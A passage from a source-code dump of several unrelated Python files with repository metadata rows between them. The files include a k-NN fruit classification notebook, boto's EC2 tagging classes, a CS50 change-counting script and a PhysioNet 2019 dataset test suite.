return self.__nome
def setImposto(self, __imposto):
self.__imposto = __imposto
def getProduto(self):
print("Nome: ",self.getNome()," Preco: ",self.getPreco()) | [
"[email protected]"
] | |
13396b7606db239a39684081d2b0a4377b4dafda | f22219d709b6837f55fb101f4bfaf38e14998c3d | /venv/Scripts/pip-script.py | 1820aaac241c680ec0cffcc35d8e15675bfc6ea9 | [] | no_license | sauravraj1/hostel | 93b96b945223d40e286712cfe2d0fa260c2f1c3e | 9455f651350dd57f61e6cad13ca477c59cf16da9 | refs/heads/master | 2022-02-25T09:27:49.494727 | 2019-10-02T09:12:02 | 2019-10-02T09:12:02 | 212,297,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\saura\PycharmProjects\hostelallotment\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
b226aec3d2c171e08332729217421343ba3d10d2 | f2886acbe9991473dd94a3fd178ae4316b8227c4 | /UserAuthentication/models.py | 2a75ca826a0c679b0195ec319de56a2f4d5effc8 | [] | no_license | monyoudom/LookBackStory | 5166353c184952ee0305dfc80e7f4bf5a4b9a68b | 6411bcffc2f6df0f03de34dd5d8ae233fb7c99b2 | refs/heads/master | 2021-05-14T01:04:34.109118 | 2018-01-24T16:38:07 | 2018-01-24T16:38:07 | 116,554,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import Permission , User
from django.db import models
| [
"[email protected]"
] | |
bf207c6d8685f1e4144d0e88c4a6bc5f614bcf4c | 4ac834504ea323238fb5f3d5b5c8b65c8df6b32f | /Module+1.py | 5bcb7e233399e9c8256b23c815726ee93d8aecf9 | [] | no_license | velamen2009/ml_with_python | e9aa4a2aadc8aa80052115201d98c8de7701201c | ebecc750291b8fdeaa1a1a7693f03fba3c97a256 | refs/heads/master | 2020-03-06T20:36:51.483422 | 2018-03-27T23:30:20 | 2018-03-27T23:30:20 | 127,057,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py |
# coding: utf-8
# ---
#
# _You are currently looking at **version 1.0** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-machine-learning/resources/bANLa) course resource._
#
# ---
# ## Applied Machine Learning, Module 1: A simple classification task
# ### Import required modules and load data file
# In[15]:
get_ipython().magic('matplotlib notebook')
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
fruits = pd.read_table('fruit_data_with_colors.txt')
# In[16]:
fruits.head()
# In[17]:
# create a mapping from fruit label value to fruit name to make results easier to interpret
lookup_fruit_name = dict(zip(fruits.fruit_label.unique(), fruits.fruit_name.unique()))
lookup_fruit_name
# The file contains the mass, height, and width of a selection of oranges, lemons and apples. The heights were measured along the core of the fruit. The widths were the widest width perpendicular to the height.
# ### Examining the data
# In[18]:
# plotting a scatter matrix
from matplotlib import cm
X = fruits[['height', 'width', 'mass', 'color_score']]
y = fruits['fruit_label']
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
cmap = cm.get_cmap('gnuplot')
scatter = pd.scatter_matrix(X_train, c= y_train, marker = 'o', s=40, hist_kwds={'bins':15}, figsize=(9,9), cmap=cmap)
# In[5]:
# plotting a 3D scatter plot
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection = '3d')
ax.scatter(X_train['width'], X_train['height'], X_train['color_score'], c = y_train, marker = 'o', s=100)
ax.set_xlabel('width')
ax.set_ylabel('height')
ax.set_zlabel('color_score')
plt.show()
# ### Create train-test split
# In[6]:
# For this example, we use the mass, width, and height features of each fruit instance
X = fruits[['mass', 'width', 'height']]
y = fruits['fruit_label']
# default is 75% / 25% train-test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# ### Create classifier object
# In[7]:
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors = 5)
# ### Train the classifier (fit the estimator) using the training data
# In[8]:
knn.fit(X_train, y_train)
# ### Estimate the accuracy of the classifier on future data, using the test data
# In[9]:
knn.score(X_test, y_test)
# ### Use the trained k-NN classifier model to classify new, previously unseen objects
# In[10]:
# first example: a small fruit with mass 20g, width 4.3 cm, height 5.5 cm
fruit_prediction = knn.predict([[20, 4.3, 5.5]])
lookup_fruit_name[fruit_prediction[0]]
# In[11]:
# second example: a larger, elongated fruit with mass 100g, width 6.3 cm, height 8.5 cm
fruit_prediction = knn.predict([[100, 6.3, 8.5]])
lookup_fruit_name[fruit_prediction[0]]
# ### Plot the decision boundaries of the k-NN classifier
# In[12]:
from adspy_shared_utilities import plot_fruit_knn
plot_fruit_knn(X_train, y_train, 5, 'uniform') # we choose 5 nearest neighbors
# ### How sensitive is k-NN classification accuracy to the choice of the 'k' parameter?
# In[13]:
k_range = range(1,20)
scores = []
for k in k_range:
knn = KNeighborsClassifier(n_neighbors = k)
knn.fit(X_train, y_train)
scores.append(knn.score(X_test, y_test))
plt.figure()
plt.xlabel('k')
plt.ylabel('accuracy')
plt.scatter(k_range, scores)
plt.xticks([0,5,10,15,20]);
# ### How sensitive is k-NN classification accuracy to the train/test split proportion?
# In[14]:
t = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2]
knn = KNeighborsClassifier(n_neighbors = 5)
plt.figure()
for s in t:
scores = []
for i in range(1,1000):
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1-s)
knn.fit(X_train, y_train)
scores.append(knn.score(X_test, y_test))
plt.plot(s, np.mean(scores), 'bo')
plt.xlabel('Training set proportion (%)')
plt.ylabel('accuracy');
# In[ ]:
# In[ ]:
| [
"[email protected]"
] | |
795a0b46e9357483c03125a7d8cc6fb63eb4b43e | 240acd20a7036636ac1b763900467401e3b5ee8c | /OCR/picam_cv/camera.py | d34c1d0f7127cefd5ba3ca4b03f84c504af62735 | [] | no_license | ycchae/6thKoreaHackathon | 5d835ab6827555e3ac6bd62bd2aaa18e8668084a | d108b5125806f2538bb9c4144b1a289189994522 | refs/heads/master | 2022-03-11T11:34:06.738640 | 2019-08-31T20:14:36 | 2019-08-31T20:14:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | from picamera import PiCamera
from ocr import Recognition
camera = PiCamera()
#camera.start_preview()
cnt = 1
recogtest = Recognition()
path = 'image10.png'
result=recogtest.ExtractNumber(path)
print(result)
'''
while True:
x = raw_input()
if x == "s":
# camera.stop_preview()
break
elif x == "c":
path = '/home/plate/Desktop/image'+str(cnt)+'.png'
# camera.capture(path)
result=recogtest.ExtractNumber(path)
# cnt += 1
print(result)
else:
print(x)
'''
| [
"[email protected]"
] | |
7df9e6788dbba56456f6f0e385d1683ce9c94950 | 58d8b2b9a1ece8cc06a2997f731a17f22edacbf0 | /cipher/plugins/vision/actions.py | c430556688ec6a0c5713935b0fbde9985d023011 | [] | no_license | valorun/CIPHER | 2c67a7b6eee1f8a593c07cb594dd922f805a468e | e7d1aef66470477d5788c2dc11c7370284a6bdf4 | refs/heads/master | 2023-07-24T04:05:54.000846 | 2022-07-24T09:36:37 | 2022-07-24T09:36:37 | 137,410,300 | 0 | 0 | null | 2023-07-18T21:53:21 | 2018-06-14T21:15:53 | Python | UTF-8 | Python | false | false | 451 | py | from cipher.core.actions import SpeechAction, CUSTOM_ACTIONS
from cipher import mqtt
class DetectObjectsAction(SpeechAction):
display_name = 'Détecter les objets'
@staticmethod
def get_parameters():
return []
@staticmethod
def check_parameters():
return True, None
@staticmethod
def execute():
mqtt.publish('client/vision/detect_objects')
CUSTOM_ACTIONS['camera_detect'] = DetectObjectsAction | [
"[email protected]"
] | |
0b2f37abadd3f1ede48d50d9364c44b7e4777b20 | 11cd362cdd78c2fc48042ed203614b201ac94aa6 | /desktop/core/ext-py3/boto-2.49.0/boto/ec2/ec2object.py | fa50a9fcc7e793e0c6e8a39ad3b52ba7f6692bef | [
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"MIT",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] | permissive | cloudera/hue | b42343d0e03d2936b5a9a32f8ddb3e9c5c80c908 | dccb9467675c67b9c3399fc76c5de6d31bfb8255 | refs/heads/master | 2023-08-31T06:49:25.724501 | 2023-08-28T20:45:00 | 2023-08-28T20:45:00 | 732,593 | 5,655 | 2,244 | Apache-2.0 | 2023-09-14T03:05:41 | 2010-06-21T19:46:51 | JavaScript | UTF-8 | Python | false | false | 5,554 | py | # Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an EC2 Object
"""
from boto.ec2.tag import TagSet
class EC2Object(object):
def __init__(self, connection=None):
self.connection = connection
if self.connection and hasattr(self.connection, 'region'):
self.region = connection.region
else:
self.region = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
setattr(self, name, value)
class TaggedEC2Object(EC2Object):
"""
Any EC2 resource that can be tagged should be represented
by a Python object that subclasses this class. This class
has the mechanism in place to handle the tagSet element in
the Describe* responses. If tags are found, it will create
a TagSet object and allow it to parse and collect the tags
into a dict that is stored in the "tags" attribute of the
object.
"""
def __init__(self, connection=None):
super(TaggedEC2Object, self).__init__(connection)
self.tags = TagSet()
def startElement(self, name, attrs, connection):
if name == 'tagSet':
return self.tags
else:
return None
def add_tag(self, key, value='', dry_run=False):
"""
Add a tag to this object. Tags are stored by AWS and can be used
to organize and filter resources. Adding a tag involves a round-trip
to the EC2 service.
:type key: str
:param key: The key or name of the tag being stored.
:type value: str
:param value: An optional value that can be stored with the tag.
If you want only the tag name and no value, the
value should be the empty string.
"""
self.add_tags({key: value}, dry_run)
def add_tags(self, tags, dry_run=False):
"""
Add tags to this object. Tags are stored by AWS and can be used
to organize and filter resources. Adding tags involves a round-trip
to the EC2 service.
:type tags: dict
:param tags: A dictionary of key-value pairs for the tags being stored.
If for some tags you want only the name and no value, the
corresponding value for that tag name should be an empty
string.
"""
status = self.connection.create_tags(
[self.id],
tags,
dry_run=dry_run
)
if self.tags is None:
self.tags = TagSet()
self.tags.update(tags)
def remove_tag(self, key, value=None, dry_run=False):
"""
Remove a tag from this object. Removing a tag involves a round-trip
to the EC2 service.
:type key: str
:param key: The key or name of the tag being stored.
:type value: str
:param value: An optional value that can be stored with the tag.
If a value is provided, it must match the value currently
stored in EC2. If not, the tag will not be removed. If
a value of None is provided, the tag will be
unconditionally deleted.
NOTE: There is an important distinction between a value
of '' and a value of None.
"""
self.remove_tags({key: value}, dry_run)
def remove_tags(self, tags, dry_run=False):
"""
Removes tags from this object. Removing tags involves a round-trip
to the EC2 service.
:type tags: dict
:param tags: A dictionary of key-value pairs for the tags being removed.
For each key, the provided value must match the value
currently stored in EC2. If not, that particular tag will
not be removed. However, if a value of None is provided,
the tag will be unconditionally deleted.
NOTE: There is an important distinction between a value of
'' and a value of None.
"""
status = self.connection.delete_tags(
[self.id],
tags,
dry_run=dry_run
)
for key, value in tags.items():
if key in self.tags:
if value is None or value == self.tags[key]:
del self.tags[key]
| [
"[email protected]"
] | |
2663a2f227caad101fd64308204e17390ed99e5e | 81419798a85127c3450e1e0342013c7a395c0b40 | /pset6/cash/cash.py | 5c18475340294b34949bc336d24f7b56f2ee5a5f | [
"MIT"
] | permissive | ctemelkuran/cs50 | 64fd1d5e665c746dee76744443dec5d83b5fb719 | 6b1e238e0716b04d8d1dbae61c6625a52dcf6e46 | refs/heads/main | 2023-01-30T15:32:27.298807 | 2020-12-13T07:30:40 | 2020-12-13T07:30:40 | 311,726,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | from cs50 import get_float
while True:
dollars = get_float("Enter the owed amount:")
if dollars >= 0:
break
cents = (dollars * 100)
total = 0
for coin in [25, 10, 5, 1]:
total += int(cents // coin)
cents %= coin
print(total) | [
"[email protected]"
] | |
f4e1c16570dac9023580fc90b033598dd13d4df0 | 70dcd504ea152b5292d80728ca37c433ec41be4c | /tests/data_physionet2019_test.py | 07b067c2032e8f551d650705f17754e8bbe6dc1e | [
"MIT"
] | permissive | philipdarke/torchtime | 64f58f4267eace54ff9cdee9d9181192acf7c12c | c22d17ae41f1675f2e32b3b37fec60f93057a1e8 | refs/heads/main | 2023-06-30T05:19:39.697699 | 2023-06-13T10:30:27 | 2023-06-13T10:30:27 | 475,093,888 | 30 | 6 | MIT | 2023-03-12T15:53:02 | 2022-03-28T16:47:59 | Python | UTF-8 | Python | false | false | 19,073 | py | import re
import pytest
import torch
from torchtime.constants import OBJ_EXT
from torchtime.data import PhysioNet2019
from torchtime.utils import _get_SHA256
SEED = 456789
RTOL = 1e-4
ATOL = 1e-4
CHECKSUM_X = "6eb80cddc4eb4fe1c4cdcae8ad35becc75469737542ca66ac417fda90f3a1db3"
CHECKSUM_Y = "8fa4a9f7f8fc532aca0a9e0df6c6fe837c3ae3d070ceb28054259ff97c8241a5"
CHECKSUM_LENGTH = "829c06fb86444f2ca806371583cd38fe2d0e29b9045ae6a4cad306bd4f4fad1f"
class TestPhysioNet2019:
"""Test PhysioNet2019 class."""
def test_invalid_split_arg(self):
"""Catch invalid split argument."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'split' must be one of ['train', 'val']"),
):
PhysioNet2019(
split="xyz",
train_prop=0.8,
seed=SEED,
)
def test_invalid_split_size(self):
"""Catch invalid split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
PhysioNet2019(
split="train",
train_prop=-0.5,
seed=SEED,
)
def test_incompatible_split_size(self):
"""Catch incompatible split sizes."""
with pytest.raises(
AssertionError,
match=re.escape("argument 'train_prop' must be in range (0, 1)"),
):
PhysioNet2019(
split="train",
train_prop=1,
seed=SEED,
)
new_prop = 0.5
with pytest.raises(
AssertionError,
match=re.escape(
"argument 'val_prop' must be in range (0, {})".format(1 - new_prop)
),
):
PhysioNet2019(
split="test",
train_prop=new_prop,
val_prop=new_prop,
seed=SEED,
)
def test_load_data(self):
"""Validate data set."""
PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
)
if CHECKSUM_X:
assert _get_SHA256(".torchtime/physionet_2019/X" + OBJ_EXT) == CHECKSUM_X
if CHECKSUM_Y:
assert _get_SHA256(".torchtime/physionet_2019/y" + OBJ_EXT) == CHECKSUM_Y
if CHECKSUM_LENGTH:
assert (
_get_SHA256(".torchtime/physionet_2019/length" + OBJ_EXT)
== CHECKSUM_LENGTH
)
def test_train_val(self):
"""Test training/validation split sizes."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.y_train.shape == torch.Size([28236, 336, 1])
assert dataset.length_train.shape == torch.Size([28236])
assert dataset.X_val.shape == torch.Size([12100, 336, 41])
assert dataset.y_val.shape == torch.Size([12100, 336, 1])
assert dataset.length_val.shape == torch.Size([12100])
# Ensure no test data is returned
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'X_test'"),
):
dataset.X_test
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'y_test'"),
):
dataset.y_test
with pytest.raises(
AttributeError,
match=re.escape("'PhysioNet2019' object has no attribute 'length_test'"),
):
dataset.length_test
def test_train_val_test(self):
"""Test training/validation/test split sizes."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.y_train.shape == torch.Size([28236, 336, 1])
assert dataset.length_train.shape == torch.Size([28236])
assert dataset.X_val.shape == torch.Size([8067, 336, 41])
assert dataset.y_val.shape == torch.Size([8067, 336, 1])
assert dataset.length_val.shape == torch.Size([8067])
assert dataset.X_test.shape == torch.Size([4033, 336, 41])
assert dataset.y_test.shape == torch.Size([4033, 336, 1])
assert dataset.length_test.shape == torch.Size([4033])
def test_train_split(self):
"""Test training split is returned."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_train, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_train, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_train, equal_nan=True)
def test_val_split(self):
"""Test validation split is returned."""
dataset = PhysioNet2019(
split="val",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_val, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_val, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_val, equal_nan=True)
def test_test_split(self):
"""Test test split is returned."""
dataset = PhysioNet2019(
split="test",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check correct split is returned
assert torch.allclose(dataset.X, dataset.X_test, equal_nan=True)
assert torch.allclose(dataset.y, dataset.y_test, equal_nan=True)
assert torch.allclose(dataset.length, dataset.length_test, equal_nan=True)
def test_length(self):
"""Test length attribute."""
dataset = PhysioNet2019(
split="test",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
for i, Xi in enumerate(dataset.X_train.unbind()):
length_i = dataset.length_train[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
for i, Xi in enumerate(dataset.X_val.unbind()):
length_i = dataset.length_val[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
for i, Xi in enumerate(dataset.X_test.unbind()):
length_i = dataset.length_test[i]
assert not torch.all(torch.isnan(Xi[length_i - 1]))
assert torch.all(torch.isnan(Xi[length_i:]))
def test_invalid_impute(self):
"""Catch invalid impute arguments."""
with pytest.raises(
AssertionError,
match=re.escape(
"argument 'impute' must be a string in ['none', 'zero', 'mean', 'forward'] or a function" # noqa: E501
),
):
PhysioNet2019(
split="train",
train_prop=0.7,
impute="blah",
seed=SEED,
)
with pytest.raises(
Exception,
match=re.escape(
"argument 'impute' must be a string in ['none', 'zero', 'mean', 'forward'] or a function" # noqa: E501
),
):
PhysioNet2019(
split="train",
train_prop=0.7,
impute=3,
seed=SEED,
)
def test_no_impute(self):
"""Test no imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="none",
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 366491058
assert torch.sum(torch.isnan(dataset.y_train)).item() == 8401181
assert torch.sum(torch.isnan(dataset.X_val)).item() == 104715681
assert torch.sum(torch.isnan(dataset.y_val)).item() == 2399984
assert torch.sum(torch.isnan(dataset.X_test)).item() == 52332856
assert torch.sum(torch.isnan(dataset.y_test)).item() == 1199521
def test_zero_impute(self):
"""Test zero imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="zero",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_mean_impute(self):
"""Test mean imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="mean",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_forward_impute(self):
"""Test forward imputation."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute="forward",
seed=SEED,
)
# Check no NaNs post imputation
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_imputation_1(self):
"""Test custom imputation function."""
def impute_with_zero(X, y, fill, select):
return X.nan_to_num(0), y.nan_to_num(0)
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute=impute_with_zero,
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_imputation_2(self):
"""Test custom imputation function."""
def no_imputation(X, y, fill, select):
"""Does not impute data i.e. same as impute='none'"""
return X, y
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
impute=no_imputation,
seed=SEED,
)
# Check number of NaNs
assert torch.sum(torch.isnan(dataset.X_train)).item() == 366491058
assert torch.sum(torch.isnan(dataset.y_train)).item() == 8401181
assert torch.sum(torch.isnan(dataset.X_val)).item() == 104715681
assert torch.sum(torch.isnan(dataset.y_val)).item() == 2399984
assert torch.sum(torch.isnan(dataset.X_test)).item() == 52332856
assert torch.sum(torch.isnan(dataset.y_test)).item() == 1199521
def test_overwrite_data(self):
"""Overwrite cache and validate data set."""
PhysioNet2019(
split="train",
train_prop=0.7,
seed=SEED,
overwrite_cache=True,
)
if CHECKSUM_X:
assert _get_SHA256(".torchtime/physionet_2019/X" + OBJ_EXT) == CHECKSUM_X
if CHECKSUM_Y:
assert _get_SHA256(".torchtime/physionet_2019/y" + OBJ_EXT) == CHECKSUM_Y
if CHECKSUM_LENGTH:
assert (
_get_SHA256(".torchtime/physionet_2019/length" + OBJ_EXT)
== CHECKSUM_LENGTH
)
def test_time(self):
"""Test time argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 41])
assert dataset.X_val.shape == torch.Size([8067, 336, 41])
assert dataset.X_test.shape == torch.Size([4033, 336, 41])
# Check time channel
for i in range(182):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([28236], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([8067], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([4033], fill_value=i, dtype=torch.float),
)
def test_no_time(self):
"""Test time argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 40])
assert dataset.X_val.shape == torch.Size([8067, 336, 40])
assert dataset.X_test.shape == torch.Size([4033, 336, 40])
def test_mask(self):
"""Test mask argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
mask=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 80])
assert dataset.X_val.shape == torch.Size([8067, 336, 80])
assert dataset.X_test.shape == torch.Size([4033, 336, 80])
def test_delta(self):
"""Test time delta argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
time=False,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 80])
assert dataset.X_val.shape == torch.Size([8067, 336, 80])
assert dataset.X_test.shape == torch.Size([4033, 336, 80])
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 40], torch.zeros([28236], dtype=torch.float)
)
assert torch.equal(
dataset.X_val[:, 0, 40], torch.zeros([8067], dtype=torch.float)
)
assert torch.equal(
dataset.X_test[:, 0, 40], torch.zeros([4033], dtype=torch.float)
)
def test_time_mask_delta(self):
"""Test combination of time/mask/delta arguments."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
mask=True,
delta=True,
seed=SEED,
)
# Check data set size
assert dataset.X_train.shape == torch.Size([28236, 336, 121])
assert dataset.X_val.shape == torch.Size([8067, 336, 121])
assert dataset.X_test.shape == torch.Size([4033, 336, 121])
# Check time channel
for i in range(182):
assert torch.equal(
dataset.X_train[:, i, 0],
torch.full([28236], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_val[:, i, 0],
torch.full([8067], fill_value=i, dtype=torch.float),
)
assert torch.equal(
dataset.X_test[:, i, 0],
torch.full([4033], fill_value=i, dtype=torch.float),
)
# Check time delta channel
assert torch.equal(
dataset.X_train[:, 0, 81], torch.zeros([28236], dtype=torch.float)
)
assert torch.equal(
dataset.X_val[:, 0, 81], torch.zeros([8067], dtype=torch.float)
)
assert torch.equal(
dataset.X_test[:, 0, 81], torch.zeros([4033], dtype=torch.float)
)
def test_standarisation(self):
"""Check training data is standardised."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
time=False,
standardise=True,
seed=SEED,
)
for c, Xc in enumerate(dataset.X_train.unbind(dim=-1)):
assert torch.allclose(
torch.nanmean(Xc), torch.Tensor([0.0]), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
torch.std(Xc[~torch.isnan(Xc)]),
torch.Tensor([1.0]),
rtol=RTOL,
atol=ATOL,
)
def test_reproducibility_1(self):
"""Test seed argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=SEED,
)
# Check first value in 39th channel
assert torch.allclose(
dataset.X_train[0, 0, 39], torch.tensor(-1.53), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_val[0, 0, 39], torch.tensor(-0.02), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_test[0, 0, 39], torch.tensor(-6.73), rtol=RTOL, atol=ATOL
)
def test_reproducibility_2(self):
"""Test seed argument."""
dataset = PhysioNet2019(
split="train",
train_prop=0.7,
val_prop=0.2,
seed=999999,
)
# Check first value in 39th channel
assert torch.allclose(
dataset.X_train[0, 0, 39], torch.tensor(-13.01), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_val[0, 0, 39], torch.tensor(-109.75), rtol=RTOL, atol=ATOL
)
assert torch.allclose(
dataset.X_test[0, 0, 39], torch.tensor(-131.18), rtol=RTOL, atol=ATOL
)
| [
"[email protected]"
] | |
33659941a8c7b53c1464ee3fca6f4abb4b38f1b2 | 805626d7ea7e702c26dd55e82cae647f0ea010de | /datasets/GSE13425/GSE13425Dataset.py | 9b998d86415be3c68f1225b196e78a9ce684ffbf | [] | no_license | krypty/BIO-SELECT | 6f3cc842c78f4986f9b420f1fd946828481df535 | b8030ee26420fefa7db8d970458738726c5b78f6 | refs/heads/master | 2021-03-16T06:52:30.418188 | 2018-12-19T07:47:53 | 2018-12-19T07:47:53 | 69,567,545 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,416 | py | import glob
import os
import re
import pandas as pd
from datasets.Dataset import Dataset
